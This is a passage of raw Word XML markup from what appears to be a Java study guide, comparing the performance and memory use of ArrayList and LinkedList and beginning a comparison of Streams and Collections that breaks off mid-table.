          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which is more efficient among the ArrayList and LinkedList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w14:paraId="2A6F3874" w14:textId="265FDE68"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have different internal implementations and performance characteristics. Here's a breakdown of their efficiencies in terms of various operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D57C4E"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FCB0A">
          <v:rect id="_x0000_i1466" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="240E7EB9"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nal Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B20567F"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02A3376F"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sed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It uses a dynamically resizing array to store elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A92430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iguous Memory Allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Elements are stored in a continuous block of memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6821B1F1"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6FB451F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 It uses a doubly linked list, where each element (node) contains a reference to both the next and previous elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B8CA97"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0D1446">
          <v:rect id="_x0000_i1467" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340F1A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ing Elements (Random Access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D844633"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685EFE4"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Random Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Since elements are stored in a contiguous memory block,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2B50BDBE"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38BF98A"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 for Random Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: To access an element by index, it has to traverse the list from the beginning or end to the specified position,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BF102F7"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for random access compared to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80BA3C9"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B2DF">
          <v:rect id="_x0000_i1468" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="619718A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Insertion and Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98C4AE"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BBE528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appending elements at the end because it requir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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6FEC1E"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in the Middle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Less efficient. When inserting or deleting an element at any position other than the end,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s required, because the elements after the inserted/deleted element need to be shifted to maintain the array's contiguous memory structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C1F8CB"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6372389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Beginning or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ng or deleting elements at the beginning or middle because it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provided you have a reference to the node. No elements need to be shifted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF1150D"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have a reference to the last node. However, if you're inserting at the end and you need to traverse to the end of the list, i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4EC16FA9"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for frequent insertions and deletions, especially when they occur at the beginning or middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE57B5C"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0DEF26">
          <v:rect id="_x0000_i1469" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BA77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Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6795A52A"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2EE1F76"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It only stores the elements themselves. However, when the array needs to resize (when it reaches its capacity), a new array is created and elements are copied over. This resizing operation can occasionally lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extra memory allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during growth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3439DE97"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B1D0FEA"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Memory Efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each element in a LinkedList requires </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extra memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the next and previous pointers, increasing memory overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F83B4F"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memory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specially for smaller collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1207FB20"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9C725A">
          <v:rect id="_x0000_i1470" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5739C1A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1551"/>
        <w:gridCol w:w="2120"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="0DB37B3C" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC72B5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CD766C0"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2E8DB70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62441" w:rsidRPr="00CE4B95" w14:paraId="77F77C02" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="398B71A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get(i))</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3594111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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C60C87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r>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6292AD11" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C5D3F7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at the end (add())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505820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5FD752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33B34436" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30065B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end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EF65CB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C4FFD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65ED5499" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F4C9BC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beginning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39017B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08F97AE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5F48FAD4" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CD3598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in the middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="331DA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13B3441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node is known)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="4D0EAECF" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DCB7F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52DD3A6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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C1642D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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47551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DBAF9A">
          <v:rect id="_x0000_i1471" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="262071C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5BA1B4A"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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB5B59C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4904DF56"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ize of the collection doesn't change frequently, or changes mostly happen at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF8D2E3"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emory efficiency is a priority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BF36D8"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A7B0EB"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perform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especially in the middle or at the beginning).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B06E7"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re working with collections where elements are frequently added or removed from various positions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84BC75"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efficiently manage a </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7600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00CA97A"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terms of access time and memory usage, making it the better choice when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CEA32F"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w memory overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02571147"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llection size is fairly stable or only occasionally grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613E840B"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when you need to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent insertions or deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, particularly at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>beginning or middle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the list. However, it has a higher memory overhead and slower random access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365C7D2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summary, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>use ArrayList for most scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where you mainly need random access, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>use LinkedList when you need efficient insertions and deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47566F46" w14:textId="23835319"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C3A1C" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="0002149E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722A7460" w14:textId="1C448EE6" w:rsidR="00277CE2" w:rsidRPr="00CE4B95" w:rsidRDefault="00527DFE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc197867355"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference</w:t>
      </w:r>
      <w:r w:rsidR="00277CE2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> between Stream and </w:t>
      </w:r>
      <w:r w:rsidR="00645695" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00277CE2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ollections?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w14:paraId="05CFA967" w14:textId="45070A44" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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oth used for working with data, but they have different purposes, functionalities, and characteristics. Here's a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA29649"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9AE0D">
          <v:rect id="_x0000_i1473" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6C1509"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3F6FBBAF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7FF20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 xml:space="preserve"> is a data structure (like a list, set, or map) that stores and organizes a group of elements. It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and is the root interface of the Java Collections Framework (e.g., List, Set, Queue, Map).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1373EA8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retrieve, manipulate, and aggregate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F81E0B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A57B44"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n abstraction introduced in Java 8, allowing functional-style operations on sequences of elements (such as collections, arrays, or I/O channels).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C76AF6D"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6FC58">
          <v:rect id="_x0000_i1474" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="049B02C6"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554"/>
        <w:gridCol w:w="4351"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="7B953B10" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49C627F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F731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133BE38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115D11" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2707C0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of Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F6D4FB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s data</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: A collection contains and holds data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F9701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tore data</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: A stream is a sequence of elements that can be processed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6648A366" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="082C383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3760E5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data structure (e.g., List, Set).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03120B5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a </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sequence of elements</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from a source.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="1334D705" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BB167C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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FE656F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Collections can be modified (e.g., adding/removing elements).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32A230B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Streams don't modify the source. They produce a new result.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="01F65E34" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D29A7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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71FEF9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manual</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g., loops).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC8F89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functional</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (using methods like map(), filter(), reduce()), and can be chained.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="3CF61682" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6388A91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0CCB93A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processing</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
